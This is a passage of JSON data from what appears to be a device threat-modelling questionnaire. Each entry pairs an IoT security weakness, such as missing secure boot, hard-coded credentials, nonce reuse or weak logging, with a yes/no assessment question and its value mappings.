protection)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92"},{"ID":"9736c676-6bb8-4fb9-beae-9213ac40d95b","Name":"State Transition","Description":"E.g., an uncleared SRAM can expose information after a software reset.","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device clear sensitive information when a power or debug state transition is performed?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"16ab50f4-dd94-43dd-8480-37cae5c61043"},{"ID":"0e873bd5-6e22-4a7d-82dd-98851bd9264e","Name":"Missing secure boot","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device implement a secure boot?","propertyID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5"},{"ID":"9b600522-8621-4f50-b71c-856efeb246cc","Name":"Missing immutable Root of Trust","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device has a immutable Root of Trust in hardware?","propertyID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6"},{"ID":"ca231237-0565-407d-a5f3-0f77f80a3c50","Name":"Improper boot order","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device boot the next stage only after the successful boot of the previous stage? ","propertyID":"eb678bc0-3ece-4937-bba3-03981c5759a4"},{"ID":"abc4b5fe-d936-41c8-9a8f-57c72c9bc3e1","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","propertyID":"f3697413-e4de-4572-90b1-8041e8ff9b67"},{"ID":"8ac90b2d-7494-47de-8cc9-7ccb6d627bd8","Name":"Boot Code Protection in RAM","Description":"","OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device protect boot code (from ROM) during execution in a volatile memory?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"885834f4-b8b6-485b-8690-6ac525dbb59d"},{"ID":"0e71f794-64d0-4aca-bbfd-3cc3593b8b5b","Name":"Less-secure downgrade","Description":"","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device\'s TLS version and configuration exclude less-secure algorithms? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b"},{"ID":"b7546823-207e-4dcd-a65f-75be3f1e8d4f","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"For symmetric algorithms using block ciphers, does the device use strong block cipher modes?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"518bbb50-aeee-4c87-95d1-8724a4dac569"},{"ID":"e8a6964f-fe95-49b9-8d5a-c1914691bb17","Name":"Appropriate parameters","Description":"For example, the encryption scheme may be good, but its parameters are not sufficient (AES-128 vs AES-256, ECC secp256 vs secp384).","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use up-to-date and appropriate parameters for cryptographic primitives?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"08377961-8f56-4b56-b684-331f77810f1d"},{"ID":"3519bc83-7b2b-4116-82fd-66a5b20479a0","Name":"Sufficient entropy","Description":"A strong source of entropy could be a True Random Number Generator (TRNG), human input, etc?\\\\nThe entropy is required for generating true random numbers or to use it as seed for a Cryptographically Secure RNG.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device provide a strong source of entropy?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"420f03a2-1ab7-4bc2-910d-4ea025518da2"},{"ID":"eca78a13-9d1c-47b1-8244-a4e2995ad0d6","Name":"Nonce reuse","Description":"IVs and nonces that are required by many cryptographic algorithms must be used only once and must be generated with high entropy, which is usually ensured by a true random number generator.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use values for initialization vectors (IV) or nonces only once? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"f35ccff8-6497-4b28-8627-7f255bce0e02"},{"ID":"1f2d06c2-db63-4016-b138-417122111a2d","Name":"Roll-back","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device prevent a firmware downgrade (roll-back) to vulnerable versions?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"d951b792-f84b-4ab3-82d1-21867e202755"},{"ID":"ca8aa7ce-e87c-4468-be08-faf66bca1696","Name":"Hard-coded credentials","Description":"For example, does the software or hardware include fixed strings/keys for developer authentication (backdoor)?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use/contain hard-coded credentials? ","propertyID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}}},{"ID":"956f9950-0d28-4e4c-8831-8a99030ccafc","Name":"Default credentials","Description":"A common vulnerability are default credentials that can be found in the manual.","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device ship with default credentials?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"714ed1de-855c-491b-8a08-745a99e17413"},{"ID":"4c4a1184-5a53-41dd-8aba-3acb663f3b6b","Name":"Password requirements","Description":"Requirements to length, reuse, common passwords, expiration, etc?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device enforce requirements to passwords?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"540e39da-3227-4e6c-86ea-32a017318511"},{"ID":"a64b3c96-c3d2-4976-a606-ae97652e2fa5","Name":"Multi-factor authentication","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device support multi-factor authentication?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"88763e20-7878-4525-81d8-c4d09b867042"},{"ID":"7aa200ee-17f1-4092-b6f9-7ef87c96dfb8","Name":"Restriction of attempts","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device restrict failed authentication attempts within a short time frame?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"aa74f499-b995-4f5e-8d92-91f3ca172743"},{"ID":"20146e1b-2de2-4b76-8482-7931a46f6090","Name":"Sensitive (authentication) information exposed","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","propertyID":"157fd588-2ea2-4260-9a25-86bf8241b31c"},{"ID":"7a53e800-1166-466e-a5da-e7cbb1f53942","Name":"Session ID expiration","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate session identifiers (e.g. session ID) after a logout?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"51473250-3891-4342-a8b8-687db16ffef3"},{"ID":"46d4d08b-030e-41ce-b14e-eb6deb5140d5","Name":"Session timeout","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate a session after a period of inactivity?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a21a6894-256f-4bfd-bd49-09352d054399"},{"ID":"b554922b-d912-427a-b1c9-e3da880038e1","Name":"Password recovery","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device implement a strong mechanism for password recovery after users forgot it?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d"},{"ID":"b22c80f8-01f7-491c-bb96-f76777bffa8f","Name":"Client-side hashing","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use a password hash instead of password for authentication (client-side password hashing)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ba8dc5f0-e1a9-4263-8179-747791b873ee"},{"ID":"ea4835f4-d40f-435b-b75c-e9e616f8337f","Name":"Hidden interfaces","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Are the hidden interfaces that developers created with the intend to be not publicly available?","propertyID":"311904f3-7898-4bab-ba74-e6024c704cd3"},{"ID":"051f0ffa-a58b-4b1b-bd19-2f46b03417af","Name":"Integrity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","propertyID":"8f47a4ac-0934-4a65-a6f3-07503c92f658"},{"ID":"181a48c3-9e33-4620-b8eb-de8877caf188","Name":"Authenticity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","propertyID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2"},{"ID":"04f1e766-95b6-4b93-9032-337ae1febdb9","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","propertyID":"000441ff-d15f-46c3-bb9c-0c949063271d"},{"ID":"75207b21-020d-4011-9d6e-9cba7f311ac7","Name":"Unknown state","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","propertyID":"3df6a845-52a2-40a9-8978-0277efd7cfcb"},{"ID":"52f64789-fac1-47f7-927c-e2c33ca4567a","Name":"Improper log access control","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is access to log files restricted to the minimum required rights to function properly?","propertyID":"8e4b2af8-b023-4991-80f5-54ffa28cd616"},{"ID":"0d4af18b-a202-44e5-b8a8-84c8ed7c6576","Name":"Missing separate location for log files","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs stored in their own partition, separate from other system files?","propertyID":"418fe90d-88fd-4066-9339-890501ea07f0"},{"ID":"2c3b6a86-04c2-4774-8fed-84178460bd05","Name":"Missing log rotation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is there a maximum size for logs and is log rotating implemented?","propertyID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f"},{"ID":"90985455-d995-4b8f-93e4-559882304b7c","Name":"Log file overwritten","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are users notified when the log file reaches its maximum size?","propertyID":"95b793b3-b68f-4533-9dc0-4e7d414effe3"},{"ID":"d6d5e1bd-d8c2-4b0c-b85a-b7cd2c9190ed","Name":"Missing log evaluation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs regularly monitored and analyzed to extract valuable information and insight?","propertyID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa"},{"ID":"fe03b451-3259-4649-963f-569e6f2f426a","Name":"Regulation compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Do all logged data comply with prevailing data protection regulations?","propertyID":"4006de15-8767-4a09-8678-84b8d6b50ae0"},{"ID":"bcebb419-09f6-41b8-83b3-88923dcac369","Name":"Missing central log backup","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device securely send logs to a central repository? ","propertyID":"bd32d10e-82d6-4e7f-9247-fe2753908e60"},{"ID":"9c9cdd06-f272-4a71-b83e-ad1d2cf0e9a8","Name":"Log files contain passwords","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device log passwords?","propertyID":"025e828e-d1a0-4487-9c56-09fd6941d4b9"},{"ID":"65b66adb-05b4-440b-a9e5-30a615ac4e6f","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are authentication attempts logged?","propertyID":"c7d5fd7a-4007-480c-a34b-cb32fab17472"},{"ID":"30c55017-8b6b-4b0b-a591-ddf03e86ee37","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user login, logout, and inactivity logged?","propertyID":"a154298a-d410-4da4-921d-906165cd5329"},{"ID":"eb07bd86-e1cf-4177-9531-4622c14e0997","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are privilege changes logged?","propertyID":"c86b6500-99cb-46e3-948f-b67b69c9768d"},{"ID":"6bf25a01-2d7e-4f4c-bd18-983b839560bc","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user management changes logged?","propertyID":"1a582358-45c2-42e2-a21e-61206a4eda7e"},{"ID":"5a2d72ab-1079-4e09-8ded-18f4c1efcf29","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are changes to the firmware logged?","propertyID":"91abf825-cfca-4386-b5d5-8262423b090d"},{"ID":"03c2354d-f29f-4e56-ad13-8b996b7a0c8a","Name":"Missing public policy","Description":"The policy can be provided either in-house or through a third party.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there are publicly available vulnerability disclosure policy?","propertyID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d"},{"ID":"591d70ce-8b09-4beb-807a-7b9801e42ec2","Name":"Missing /security page","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer use /security to provide security-related topics?","propertyID":"36e1de4b-5129-470f-b06d-208ef7610da8"},{"ID":"1fff723c-b343-432b-a7e1-b5b7780bad03","Name":"Missing security.txt","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","propertyID":"3affc4da-9a78-43ec-990b-75d20edbc410"},{"ID":"aa359dc1-5ac3-469a-b61c-ce910221acdc","Name":"Missing contact email address","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide an email account for security related topics?","propertyID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c"},{"ID":"b089383b-9c6b-46ac-b255-59da1c622afe","Name":"Missing PGP key","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide a PGP on their website for secure communication?","propertyID":"61d4b9c9-19a9-431e-b114-f2c04b48846b"},{"ID":"8b63f920-3f9c-4a00-afba-7b3d328bfd56","Name":"Missing reporting system","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there a public vulnerability reporting system?","propertyID":"23943ca9-3df9-4d69-a414-6d8fef99d30c"},{"ID":"45134e98-27a6-4345-b5d2-1584920f9fa4","Name":"Missing timeline info","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there information on the timelines for acknowledgement and resolution of reported issues?","propertyID":"e7d90cc4-822e-4aab-a161-c766cf13df22"},{"ID":"f60997da-93c7-4b86-8ade-c6a8fa03cded","Name":"Missing bug bounty program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a bug bounty program?","propertyID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4"},{"ID":"9a672303-34ad-48df-9ca0-11c64f057707","Name":"Non-disclosure","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Does the manufacturer enable a coordinated vulnerability disclosure?","propertyID":"dd2c4c41-45f0-4105-aea4-317943e2f435"},{"ID":"81a26318-6836-4280-a146-dbbd515733f2","Name":"Missing Firmware Encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Is the firmware update encrypted?","propertyID":"434d79b2-574c-4575-813b-19ec7854a139"},{"ID":"f797f4ac-1e25-4463-b77c-1a90e7ccdc6a","Name":"Unnecessary components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","propertyID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50"},{"ID":"6f7a6386-8b2f-42cc-9433-8f8963362f66","Name":"Outdated OS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the OS the latest available stable version?","propertyID":"4ba05121-485a-40eb-832a-f4095c7b88df"},{"ID":"d8245144-c203-40b8-8d62-ac822810381d","Name":"Secure configuration not default","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the device ship with the most secure configuration in place (security by default)?","propertyID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1"},{"ID":"a5b98b6e-be51-47ca-aeb8-975a5669d590","Name":"Missing component update process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","propertyID":"36ed4680-0b94-42a9-9863-08eb976c9ebc"},{"ID":"c8caecc4-6cc7-4e60-9013-b7e4ef16a3c2","Name":"Activated services and ports","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Are all ports, protocols, and services that are not used deactivated?","propertyID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6"},{"ID":"6a468670-eb0a-416d-9e22-bac4fa377463","Name":"Improper permission configuration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the access to the root file system restricted for users/applications?","propertyID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c"},{"ID":"d3df84cb-3ee1-4b90-9bdd-fa33d67ff0d0","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Have all files and directories the minimum required access rights (least privilege principal)?","propertyID":"7378780b-e280-4494-84f2-0beb4e7257ec"},{"ID":"e4a8a85e-77e2-41d5-85aa-1210083b4f6a","Name":"Missing file system encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the file system encrypted?","propertyID":"85e19877-51a0-4904-8e98-b2fb14be3922"},{"ID":"d1ed0929-25af-4c4f-9cbf-228d0a235e26","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","propertyID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0"},{"ID":"333ea9fb-0f19-462d-a7af-0f15322b878c","Name":"Missing application isolation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, containerisation, or hardware mechansims?  ","propertyID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25"},{"ID":"2f0371b7-d68e-4ee7-ac59-2f2ee0b8bcf6","Name":"Improper input validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is all data input sanitized and validated before processing?","propertyID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8"},{"ID":"50c49be8-97f0-42f3-816e-94bea0b35d02","Name":"Keys not stored in security module","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","propertyID":"64bb2754-a187-47c8-aa93-e599f0a97a57"},{"ID":"3a5c0215-3d89-429a-8cff-becff1a625f3","Name":"Missing key encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys encrypted using a key encryption key (KEK)? ","propertyID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e"},{"ID":"3bd6ada0-7f40-4b6a-83cf-502b1eb1a9a5","Name":"Key usage in untrusted environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","propertyID":"b43ada71-51c6-4f5e-b310-a1735a41e602"},{"ID":"575c4c06-6b6f-4982-8f57-d0cf074d0cc9","Name":"Missing tamper resistant unique ID","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","propertyID":"08ee42e8-3525-4767-98e3-f7492f356d2f"},{"ID":"e3f323c6-a0f4-46bb-ba3b-418970e02d7c","Name":"Missing unique user identification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are users identified by a unique identifier? ","propertyID":"6391f8f2-eb04-4caf-b490-49c920315867"},{"ID":"207a9b2c-de5c-48a0-9e60-d55de9b13cb3","Name":"Missing privilege 